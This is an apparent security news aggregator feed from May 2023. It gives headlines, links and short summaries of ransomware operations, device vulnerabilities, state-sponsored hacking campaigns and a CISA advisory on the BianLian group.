                Autosummary: Some of the conflicting game anti-cheat drivers causing Windows crashes or conflicts when Kernel-mode HSP is enabled include PUBG, Valorant (Riot Vanguard), Bloodhunt, Destiny 2, Genshin Impact, Phantasy Star Online 2 (Game Guard), and Dayz. One week later, on April 26, Redmond announced they fixed the LSA Protection UI issue, however, this was just done by removing the setting in the KB5007651 Defender update to ensure that the confusing alerts would no longer be displayed in the Windows Settings app. "


                MalasLocker ransomware targets Zimbra servers, demands charity donation

                exploits ransomware
                2023-05-17 https://www.bleepingcomputer.com/news/security/malaslocker-ransomware-targets-zimbra-servers-demands-charity-donation/
                A new ransomware operation is hacking Zimbra servers to steal emails and encrypt files. However, instead of demanding a ransom payment, the threat actors claim to require a donation to charity to provide an encryptor and prevent data leaking. [...] "

                Autosummary: While the ransom notes do not contain a link to the ransomware gang’s data leak site, Emsisoft threat analyst Brett Callow found a link to their data leak site, having the title, "Somos malas... podemos ser peores," translated to, "We are bad... we can be worse." The Age encryption tool was developed by Filippo Valsorda, cryptographer and Go security lead at Google, and uses the X25519 (an ECDH curve), ChaCha20-Poly1305, and HMAC-SHA256 algorithms. "


                Leaked Babuk ransomware builder code lives on as RA Group

                exploits ransomware
                2023-05-17 https://www.malwarebytes.com/blog/news/2023/05/leaked-babuk-ransomware-builder-code-lives-on-as-ra-group

                Categories: News

                Tags: ransomware

                Tags: RA Group

                Tags: babuk

                Tags: code

                Tags: leaked

                Tags: encrypted

                Tags: stolen

                Tags: exfiltrated

                Tags: ransom

                Tags: hijack

                Tags: blackmail

                Tags: double extortion

                Tags: leak

                Tags: sell

                We take a look at yet another ransomware group making use of leaked Babuk code.

                (Read more...)

                The post Leaked Babuk ransomware builder code lives on as RA Group appeared first on Malwarebytes Labs.

                "

                Autosummary: If you’re unfortunate enough to end up on the leak portal, your details are organised like so: organisation name; a list of stolen data / file size; organisation URL. Customised ransom notes are used for compromised entities, with three days given to pay up or risk the data being made public. Should your data eventually end up for sale, the below message may eventually provide lots of sleepless nights: "If you want to buy this data, please contact us by qtox." qTox is an instant messaging tool billed as being secure and private, particularly with regard to avoiding having your Government listening in on what you might be saying. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


                Smashing Security podcast #322: When you buy a criminal’s phone, and paying for social media scams

                financial
                2023-05-17 https://grahamcluley.com/smashing-security-podcast-322-when-you-buy-a-criminals-phone-and-paying-for-social-media-scams/
                Personal information is going for a song, and the banks want social media sites to pay when their users get scammed. All this and much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. "

                Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "


                Serious Unpatched Vulnerability Uncovered in Popular Belkin Wemo Smart Plugs

                exploits
                2023-05-17 https://thehackernews.com/2023/05/serious-unpatched-vulnerability.html
                The second generation version of Belkin's Wemo Mini Smart Plug has been found to contain a buffer overflow vulnerability that could be weaponized by a threat actor to inject arbitrary commands remotely. The issue, assigned the identifier CVE-2023-27217, was discovered and reported to Belkin on January 9, 2023, by Israeli IoT security company Sternum, which reverse-engineered the device and "

                Autosummary: "


                State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered

                government
                2023-05-17 https://thehackernews.com/2023/05/state-sponsored-sidewinder-hacker.html
                Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China. This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News. "The identified phishing "

                Autosummary: The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore. "


                U.S. Offers $10 Million Bounty for Capture of Notorious Russian Ransomware Operator

                exploits ransomware rusia-ucrania
                2023-05-17 https://thehackernews.com/2023/05/us-offers-10-million-bounty-for-capture.html
                A Russian national has been charged and indicted by the U.S. Department of Justice (DoJ) for launching ransomware attacks against "thousands of victims" in the country and across the world. Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar), the 30-year-old individual in question, is alleged to be a "central figure" in the development and deployment of LockBit, Babuk, "

                Autosummary: Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar), the 30-year-old individual in question, is alleged to be a "central figure" in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020. "


                Monitoring the dark web to identify threats to energy sector organizations

                industry
                2023-05-17 https://securityaffairs.com/146357/deep-web/dark-web-initial-access-energy-sector-orgs.html

                Searchlight Cyber researchers warn of threat actors that are offering on the dark web access to energy sector organizations. Dark web intelligence firm Searchlight Cyber published a report that analyzes how threat actors in the dark web prepare their malicious operations against energy organizations. The threat actors use the hidden part of the web to […]

                The post Monitoring the dark web to identify threats to energy sector organizations appeared first on Security Affairs.

                "

                Autosummary: Threat actors auction initial access to remote software, RDP access, VPNs, and stolen credentials, allowing attackers to use these accesses to establish a foothold in the target organization and launch the attack on both IT and OT infrastructure. "


                US Gov offers a $10M reward for a Russian ransomware actor

                exploits ransomware rusia-ucrania
                2023-05-17 https://securityaffairs.com/146345/cyber-crime/russian-ransomware-actor-reward.html

                The US government is offering a $10M reward for Russian national Mikhail Pavlovich Matveev (30) charged for his role in ransomware attacks The US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks. The DoJ unsealed two indictments charging the man […]

                The post US Gov offers a $10M reward for a Russian ransomware actor appeared first on Security Affairs.

                "

                Autosummary: “From Russia and hiding behind multiple aliases, Matveev is alleged to have used these ransomware strains to encrypt and hold hostage for ransom the data of numerous victims, including hospitals, schools, nonprofits, and law enforcement agencies, like the Metropolitan Police Department in Washington, D.C.,” said U.S. Attorney Philip R. Sellinger for the District of New Jersey. "


                Multiple flaws in Teltonika industrial cellular router expose OT networks to hack

                industry
                2023-05-17 https://securityaffairs.com/146317/hacking/teltonika-industrial-cellular-routers-flaws.html

                Experts found multiple vulnerabilities in Teltonika industrial cellular routers that could expose OT networks to cyber attacks. A joint analysis conducted by industrial cybersecurity firms Claroty and Otorio discovered multiple flaws in Teltonika Networks’ IIoT products that can expose OT networks to remote attacks. Teltonika Networks is a leading manufacturer of networking solutions, widely adopted […]

                The post Multiple flaws in Teltonika industrial cellular router expose OT networks to hack appeared first on Security Affairs.

                "

                Autosummary: Remote Management System (RMS): Versions prior to 4.14.0 (affected by CVE-2023-2586) RUT model routers: Version 00.07.00 through 00.07.03.4 (affected by CVE-2023-32349) RUT model routers: Version 00.07.00 through 00.07.03 (affected by CVE-2023-32350) “While hundreds of thousands of Teltonika devices are deployed worldwide, a search on internet-scanning engines such as Shodan and Censys also reveals thousands of internet-facing devices, with their management ports externally exposed to the internet.” concludes Otorio. "


                Colchester City Council investigating Capita over "serious data breach"

                financial government
                2023-05-17 https://www.bbc.co.uk/news/technology-65622363?at_medium=RSS&at_campaign=KARANGA
                Colchester City Council "extremely disappointed" Capita failed to fully secure historic benefits data. "

                Autosummary: "


                Russian ransomware affiliate charged with attacks on critical infrastructure

                exploits ransomware rusia-ucrania
                2023-05-16 https://www.bleepingcomputer.com/news/security/russian-ransomware-affiliate-charged-with-attacks-on-critical-infrastructure/
                The U.S. Justice Department has filed charges against a Russian citizen named Mikhail Pavlovich Matveev (also known as Wazawaka or Boriselcin) for involvement in three ransomware operations that targeted victims across the United States. [...] "

                Autosummary: "


                Ransomware Prevention – Are Meeting Password Security Requirements Enough

                exploits
                2023-05-16 https://www.bleepingcomputer.com/news/security/ransomware-prevention-are-meeting-password-security-requirements-enough/
                As ransomware attacks continue to wreak havoc on organizations worldwide, many official standards and regulations have been established to address this pressing issue. Explore whether these regulated standards are sufficient or if organizations should strive for more robust security measures. [...] "

                Autosummary: "


                New ZIP domains sparks debate among cybersecurity experts

                ciber
                2023-05-16 https://www.bleepingcomputer.com/news/security/new-zip-domains-sparks-debate-among-cybersecurity-experts/
                Cybersecurity researchers and IT admins have raised concerns over Google's new ZIP and MOV Internet domains, warning that threat actors could use them for phishing attacks and malware delivery. [...] "

                Autosummary: domains that are associated with common ZIP archives, such as update.zip, financialstatement.zip, setup.zip, attachment.zip, officeupdate.zip, and backup.zip, to display information about the risks of ZIP domains, to RickRoll you, or to share harmless information. The new domains are .dad, .esq, .prof, .phd, .nexus, .foo, and for the topic of our article, the .zip and .mov domain TLDs. However, these domains could be perceived as risky as the TLDs are also extensions of files commonly shared in forum posts, messages, and online discussions, which will now be automatically converted into URLs by some online platforms or applications. "


                New ZIP domains spark debate among cybersecurity experts

                ciber
                2023-05-16 https://www.bleepingcomputer.com/news/security/new-zip-domains-spark-debate-among-cybersecurity-experts/
                Cybersecurity researchers and IT admins have raised concerns over Google's new ZIP and MOV Internet domains, warning that threat actors could use them for phishing attacks and malware delivery. [...] "

                Autosummary: domains that are associated with common ZIP archives, such as update.zip, financialstatement.zip, setup.zip, attachment.zip, officeupdate.zip, and backup.zip, to display information about the risks of ZIP domains, to RickRoll you, or to share harmless information. The new domains are .dad, .esq, .prof, .phd, .nexus, .foo, and for the topic of our article, the .zip and .mov domain TLDs. However, these domains could be perceived as risky as the TLDs are also extensions of files commonly shared in forum posts, messages, and online discussions, which will now be automatically converted into URLs by some online platforms or applications. "


                Expel’s UK cybersecurity landscape report sheds light on the challenges facing organisations

                ciber
                2023-05-16 https://grahamcluley.com/feed-sponsor-expel/
                Graham Cluley Security News is sponsored this week by the folks at Expel. Thanks to the great team there for their support! Expel wanted to find out what cybersecurity issues were most important to organisations in the United Kingdom, so it surveyed 500 IT decision-makers (ITDMs) to get a better sense for the state of … Continue reading "Expel’s UK cybersecurity landscape report sheds light on the challenges facing organisations" "

                Autosummary: "


                China"s Mustang Panda Hackers Exploit TP-Link Routers for Persistent Attacks

                exploits
                2023-05-16 https://thehackernews.com/2023/05/chinas-mustang-panda-hackers-exploit-tp.html
                The Chinese nation-state actor known as Mustang Panda has been linked to a new set of sophisticated and targeted attacks aimed at European foreign affairs entities since January 2023. An analysis of these intrusions, per Check Point researchers Itay Cohen and Radoslaw Madej, has revealed a custom firmware implant designed explicitly for TP-Link routers. "The implant features several malicious "

                Autosummary: " The Israeli cybersecurity firm is tracking the threat group under the mythical creature name Camaro Dragon, which is also known as BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich. "


                Inside Qilin Ransomware: Affiliates Take Home 85% of Ransom Payouts

                exploits ransomware
                2023-05-16 https://thehackernews.com/2023/05/inside-qilin-ransomware-affiliates-take.html
                Ransomware affiliates associated with the Qilin ransomware-as-a-service (RaaS) scheme earn anywhere between 80% to 85% of each ransom payment, according to new findings from Group-IB. The cybersecurity firm said it was able to infiltrate the group in March 2023, uncovering details about the affiliates' payment structure and the inner workings of the RaaS program following a private conversation "

                Autosummary: "


                CopperStealer Malware Crew Resurfaces with New Rootkit and Phishing Kit Modules

                financial exploits
                2023-05-16 https://thehackernews.com/2023/05/water-orthrus-copperstealer-malware.html
                The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish. Trend Micro is tracking the financially motivated group under the name Water Orthrus. The adversary is also assessed to be behind another campaign known as Scranos, which was detailed by Bitdefender in "

                Autosummary: It achieves this by "starting a rundll32 process and injecting a simple program with a browser window (written in Visual Basic) in it," which loads a phishing page urging victims to scan a QR code in order to verify their identity and enter a confirmation code to "restore your device's network." "The credential verification and confirmation code are two useful features that make this phishing kit more successful, as the victim cannot simply close the window or enter fake information just to get rid of the window," the researchers said. "


                You may not care where you download software from, but malware does

                exploits
                2023-05-16 https://www.welivesecurity.com/2023/05/16/you-may-not-care-where-download-software-malware-does/

                Why do people still download files from sketchy places and get compromised as a result?

                The post You may not care where you download software from, but malware does appeared first on WeLiveSecurity

                "

                Autosummary: It steals credentials from many programs including Discord, FileZilla, Steam, Telegram, and various VPN clients (such as OpenVPN and ProtonVPN), as well as cookies and credentials from web browsers such as Google Chrome, Mozilla Firefox, and their derivatives. Bruce P. Burrell, Alexandre Côté Cyr, Nick FitzGerald, Tomáš Foltýn, Lukáš Štefanko, and Righard Zwienenberg for their assistance with this article, as well as Neowin for publishing the original version of it. Safe(r) downloads: When security practitioners talk about downloading files only from reputable websites, it seems that we are often only doing half of the job of educating the public about them, or maybe even a little less, for that matter: we’ve done a far better job of telling people what kind of sites to go to (reputable ones, obviously) without explaining what makes a site safe to download from in the first place. Yes, it could be a site with the same domain name as the publisher’s site, but it could also be that the files are located on GitHub, SourceForge, hosted on a content delivery network (CDN) operated by a third party, and so forth. While the goal of any search engine—whether it is Bing, DuckDuckGo, Google, Yahoo, or another—is to provide the best and most accurate results, their core businesses often revolve around advertising. It also collects some information about the environment where it is running, such as display size, the processor, RAM, video card, and a list of programs and processes on the computer. One might assume these sites to be reputable download sites, and for the most part they are exactly that, but there is no 100% guarantee: unscrupulous software authors have circumvented app stores’ vetting processes to distribute software that invades people’s privacy with spyware, displays egregious advertisements with adware, and engages in other unwanted behaviors. And from the information security practitioner’s side, where exactly is the disconnect occurring between what we’re telling people to do (or not do, as the case may be), and what they are doing (or, again, not doing)? "


                Lacroix Group shut down three facilities after a ‘targeted cyberattack’

                ciber
                2023-05-16 https://securityaffairs.com/146335/cyber-crime/lacroix-group-ransomware-attack.html

                French electronics manufacturer Lacroix Group shut down three plants after a cyber attack, experts believe it was the victim of a ransomware attack. The French electronics manufacturer Lacroix Group shut down three facilities in France, Germany, and Tunisia in response to a cyber attack. The group designs and manufactures electronic equipment for its customers in […]

                The post Lacroix Group shut down three facilities after a ‘targeted cyberattack’ appeared first on Security Affairs.

                "

                Autosummary: "


                New RA Group ransomware targets U.S. orgs in double-extortion attacks

                exploits ransomware
                2023-05-15 https://www.bleepingcomputer.com/news/security/new-ra-group-ransomware-targets-us-orgs-in-double-extortion-attacks/
                A new ransomware group named "RA Group" is targeting pharmaceutical, insurance, wealth management, and manufacturing firms in the United States and South Korea. [...] "

                Autosummary: In addition to the ransomware groups cited in the Sentinel Labs report as users of Babuk, Cisco Talos also mentions Rook, Night Sky, Pandora, Nokoyawa, Cheerscrypt, AstraLocker 2.0, and ESXiArgs. "


                Ransomware gang steals data of 5.8 million PharMerica patients

                exploits
                2023-05-15 https://www.bleepingcomputer.com/news/security/ransomware-gang-steals-data-of-58-million-pharmerica-patients/
                Pharmacy services provider PharMerica has disclosed a massive data breach impacting over 5.8 million patients, exposing their medical data to hackers. [...] "

                Autosummary: "


                Stealthy MerDoor malware uncovered after five years of attacks

                exploits
                2023-05-15 https://www.bleepingcomputer.com/news/security/stealthy-merdoor-malware-uncovered-after-five-years-of-attacks/
                A new APT hacking group dubbed Lancefly uses a custom "Merdoor" backdoor malware to target government, aviation, and telecommunication organizations in South and Southeast Asia. [...] "

                Autosummary: The rootkit's loader, "FormDII.dll," exports functions that can be used to drop payloads that match the host's system architecture, read and execute shellcode from a file, kill processes, and more. "


                Philadelphia Inquirer operations disrupted after cyberattack

                ciber
                2023-05-15 https://www.bleepingcomputer.com/news/security/philadelphia-inquirer-operations-disrupted-after-cyberattack/
                The Philadelphia Inquirer daily newspaper is working on restoring systems impacted by what was described as a cyberattack that hit its network over the weekend. [...] "

                Autosummary: News Corporation, a mass media and publishing giant that owns New York Post, The Wall Street Journal, Dow Jones, MarketWatch, Fox News, Barron's, The Sun, and News UK, also disclosed in February 2023 that Chinese-linked attackers had access to its network between February 2020 and January 2022. "


                The new info-stealing malware operations to watch out for

                exploits
                2023-05-15 https://www.bleepingcomputer.com/news/security/the-new-info-stealing-malware-operations-to-watch-out-for/
                The information-stealing malware market is constantly evolving, with multiple malware operations competing for cybercriminal customers by promoting better evasion and increased ability to steal data from victims. [...] "

                Autosummary: The emerging info-stealers: Although older strains like RedLine, Raccoon, and Vidar continue to have a significant presence, and newer families like Aurora, Mars, and Meta are still growing, new malware families are also trying to make a name for themselves this year. "


                Update now! Ruckus vulnerability added to CISA’s list of actively exploited bugs

                exploits
                2023-05-15 https://www.malwarebytes.com/blog/news/2023/05/update-now-ruckus-vulnerability-added-to-cisa-known-to-be-exploited-catalog

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Ruckus

                Tags: CISA

                Tags: AndoryuBot

                Tags: CVE-2023-25717

                Tags: 163.123.142.146

                CISA has added a Ruckus vulnerability being abused by the AndoryuBot botnet to its catalog.

                The post Update now! Ruckus vulnerability added to CISA’s list of actively exploited bugs appeared first on Malwarebytes Labs.

                "

                Autosummary: Protection: To protect your devices against the AndoryuBot botnet, which seems to thrive on this vulnerability, you should install the available patches and replace the legacy devices that have reached EoL. Other measures to protect your devices from falling prey to botnets are: use strong passwords and multi-factor authentication where possible. "


                Why we should be more open about ransomware attacks

                exploits ransomware
                2023-05-15 https://www.malwarebytes.com/blog/news/2023/05/why-we-should-be-more-open-about-ransomware-attacks

                Categories: News

                Categories: Ransomware

                Tags: ransomware

                Tags: data breach

                Tags: dark web

                Tags: share information

                Paying the ransom and not saying a word about what happened is what cybercriminals would like us all to do.

                The post Why we should be more open about ransomware attacks appeared first on Malwarebytes Labs.

                "

                Autosummary: Depending on the country an organization is based in, whether they handle data under GDPR regulations, whether they are a government contractor, what sector they are active in, or whatever other reasons, some organizations have a legal obligation to notify one or more authorities about a cyberattack. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The UK’s National Cyber Security Centre (NCSC) has published an article that reflects on why it’s so concerning when cyberattacks go unreported, saying: ...we are increasingly concerned about what happens behind the scenes of the attacks we don’t hear about, particularly the ransomware ones. "


                #StopRansomware: BianLian Ransomware Group

                exploits ransomware
                2023-05-15 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

                Summary

                Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.

                Actions to take today to mitigate cyber threats from BianLian ransomware and data extortion:
                • Strictly limit the use of RDP and other remote desktop services.
                • Disable command-line and scripting activities and permissions.
                • Restrict usage of PowerShell and update Windows PowerShell or PowerShell Core to the latest version.

                BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is n "

                Autosummary: In addition, FBI, CISA, and ACSC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or ACSC. Resources, Reporting: The FBI is seeking any information that can be shared, including boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with BianLian actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files. Validate Security Controls: In addition to applying mitigations, FBI, CISA, and ACSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. [T1587.001] and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control [T1105], [T1219]. Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. Defense Evasion: BianLian group actors use PowerShell [T1059.001] and Windows Command Shell [T1059.003] to disable antivirus tools [T1562.001], specifically Windows Defender and Anti-Malware Scan Interface (AMSI). SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders [T1135]. BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. FBI, CISA, and ACSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Tune your security program, including people, processes, and technologies, based on the data generated by this process. Collection: FBI observed BianLian group actors using malware (system.exe) that enumerates registry [T1012] and files [T1083] and copies clipboard data from users [T1115]. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory [T1003.001], download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit). Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C]. Initial Access: BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers [T1078], [T1133] or via phishing [T1566]. [T1112] to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. "


                Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

                industry
                2023-05-15 https://thehackernews.com/2023/05/industrial-cellular-routers-at-risk-11.html
                Several security vulnerabilities have been disclosed in cloud management platforms associated with three industrial cellular router vendors that could expose operational technology (OT) networks to external attacks. The findings were presented by Israeli industrial cybersecurity firm OTORIO at the Black Hat Asia 2023 conference last week. "Industrial cellular routers and gateways are essential "

                Autosummary: The six flaws impacting Teltonika Networks RMS – CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587, and CVE-2023-2588 – were discovered following a "comprehensive research" carried out in collaboration with Claroty. "


                New Ransomware Gang RA Group Hits U.S. and South Korean Organizations

                exploits ransomware
                2023-05-15 https://thehackernews.com/2023/05/new-ransomware-gang-ra-group-hits-us.html
                A new ransomware group known as RA Group has become the latest threat actor to leverage the leaked Babuk ransomware source code to spawn its own locker variant. The cybercriminal gang, which is said to have been operating since at least April 22, 2023, is rapidly expanding its operations, according to cybersecurity firm Cisco Talos. "To date, the group has compromised three organizations in the "

                Autosummary: "To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals," security researcher Chetan Raghuprasad said in a report shared with The Hacker News. "


                New "MichaelKors" Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems

                exploits ransomware
                2023-05-15 https://thehackernews.com/2023/05/new-michaelkors-ransomware-as-service.html
                A new ransomware-as-service (RaaS) operation called MichaelKors has become the latest file-encrypting malware to target Linux and VMware ESXi systems as of April 2023. The development points to cybercriminal actors increasingly setting their eyes on the ESXi, cybersecurity firm CrowdStrike said in a report shared with The Hacker News. "This trend is especially noteworthy given the fact that ESXi "

                Autosummary: Other notable e-crime outfits that have updated their arsenal to target ESXi consist of ALPHV (BlackCat), Black Basta, Defray, ESXiArgs, LockBit, Nevada, Play, Rook, and Rorschach. "


                CLR SqlShell Malware Targets MS SQL Servers for Crypto Mining and Ransomware

                exploits ransomware
                2023-05-15 https://thehackernews.com/2023/05/clr-sqlshell-malware-targets-ms-sql.html
                Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign that's designed to propagate a category of malware called CLR SqlShell that ultimately facilitates the deployment of cryptocurrency miners and ransomware. "Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, "

                Autosummary: "


                Mexico dispatches discarded presidential jet to Tajikistan

                latam
                2023-05-15 https://www.bbc.co.uk/news/world-latin-america-65596470?at_medium=RSS&at_campaign=KARANGA
                After several unsuccessful attempts to raffle off the Dreamliner, Mexico sold the jet to Tajikistan. "

                Autosummary: "


                Hackers target Wordpress plugin flaw after PoC exploit released

                exploits
                2023-05-14 https://www.bleepingcomputer.com/news/security/hackers-target-wordpress-plugin-flaw-after-poc-exploit-released/
                Hackers are actively exploiting a recently fixed vulnerability in the WordPress Advanced Custom Fields plugin roughly 24 hours after a proof-of-concept (PoC) exploit was made public. [...] "

                Autosummary: "


                Chile's new law blazes trail for children of femicide victims

                latam
                2023-05-14 https://www.bbc.co.uk/news/world-latin-america-65560082?at_medium=RSS&at_campaign=KARANGA
                A new law will provide an allowance for children of mothers killed by their partners or ex-partners. "

                Autosummary: "


                New Phishing-as-a-Service Platform Lets Cybercriminals Generate Convincing Phishing Pages

                financial ciber
                2023-05-13 https://thehackernews.com/2023/05/new-phishing-as-service-platform-lets.html
                A new phishing-as-a-service (PhaaS or PaaS) platform named Greatness has been leveraged by cybercriminals to target business users of the Microsoft 365 cloud service since at least mid-2022, effectively lowering the bar to entry for phishing attacks. "Greatness, for now, is only focused on Microsoft 365 phishing pages, providing its affiliates with an attachment and link builder that creates "

                Autosummary: Campaigns involving Greatness have mainly targeted manufacturing, health care, and technology entities located in the U.S., the U.K., Australia, South Africa, and Canada, with a spike in activity detected in December 2022 and March 2023. "


                Discord discloses data breach after support agent got hacked

                financial
                2023-05-12 https://www.bleepingcomputer.com/news/security/discord-discloses-data-breach-after-support-agent-got-hacked/
                Discord is notifying users of a data breach that occurred after the account of a third-party support agent was compromised. [...] "

                Autosummary: "


                CISA warns of critical Ruckus bug used to infect Wi-Fi access points

                exploits
                2023-05-12 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-ruckus-bug-used-to-infect-wi-fi-access-points/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned today of a critical remote code execution (RCE) flaw in the Ruckus Wireless Admin panel actively exploited by a recently discovered DDoS botnet. [...] "

                Autosummary: "


                FBI: Bl00dy Ransomware targets education orgs in PaperCut attacks

                exploits ransomware
                2023-05-12 https://www.bleepingcomputer.com/news/security/fbi-bl00dy-ransomware-targets-education-orgs-in-papercut-attacks/
                The FBI and CISA issued a joint advisory to warn that the Bl00dy Ransomware gang is now also actively exploiting a PaperCut remote-code execution vulnerability to gain initial access to networks. [...] "

                Autosummary: "In early May 2023, according to FBI information, the Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet," reads the security advisory. "Ultimately, some of these operations led to data exfiltration and encryption of victim systems. "


                The Week in Ransomware - May 12th 2023 - New Gangs Emerge

                exploits ransomware
                2023-05-12 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-12th-2023-new-gangs-emerge/
                This week we have multiple reports of new ransomware families targeting the enterprise, named Cactus and Akira, both increasingly active as they target the enterprise. [...] "

                Autosummary: Finally, researchers and law enforcement released new reports: Contributors and those who provided new ransomware information and stories this week include: @PolarToffee, @malwrhunterteam, @Ionut_Ilascu, @demonslay335, @struppigel, @malwareforme, @BleepinComputer, @billtoulas, @FourOctets, @serghei, @VK_Intel, @fwosar, @LawrenceAbrams, @Seifreed, @jorntvdw, @DanielGallagher, @LabsSentinel, @BrettCallow, @matrosov, @binarly_io, @Checkmarx, @KrollWire, @yinzlovecyber, and @pcrisk. May 7th 2023 The new Akira ransomware operation has slowly been building a list of victims as they breach corporate networks worldwide, encrypt files, and then demand million-dollar ransoms. "


                Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app

                industry
                2023-05-12 https://www.malwarebytes.com/blog/news/2023/05/sponsored-twitter-post-goes-forex-trading-with-fake-bbc-site

                Categories: News

                Categories: Personal

                Tags: forex

                Tags: BBC

                Tags: fake

                Tags: trading

                Tags: digital

                Tags: reviews

                Tags: website

                Tags: AI

                Tags: app

                Tags: phone

                Tags: twitter

                Tags: sponsored

                Tags: ad

                Tags: advert

                Tags: blue check

                Tags: verified

                We take a look at a daisy chain of links and clicks leading from a sponsored Twitter ad to a fake BBC website offering up an AI trading app.

                The post Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app appeared first on Malwarebytes Labs.

                "

                Autosummary: The Tweet reads as follows: “Check out what benefits you can get if you are British”. The Community Notes added to this tweet state: The link, via many redirects, goes to a fake BBC news page promoting an "automated trading platform" scam. If you click it, the site displays the following message: Dear client, In order to deposit funds to your trading account, your account manager will contact you via the phone in the following minutes, please be available to take the call. Plus, we also have the below almost identical review from another user: I have been using [the site] for several years now, and I have never had any issues with withdrawals or deposits. Clicking the link while using a VPN or the TOR browser, which places you outside the UK, results in an “advertorial” for an article promoting a UK-based immigration advice firm. Here’s a particularly odd review, considering the site is just a few months old: “I have been with them for several years now and have never experienced any issues. "


                Atomic malware steals Mac passwords, crypto wallets, and more

                exploits
                2023-05-12 https://grahamcluley.com/atomic-malware-steals-mac-passwords-crypto-wallets-and-more/
                Cybercriminals have developed a new malware threat which can steal highly sensitive data from the Mac computers it infects. "

                Autosummary: "


                XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

                exploits
                2023-05-12 https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html
                Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather "

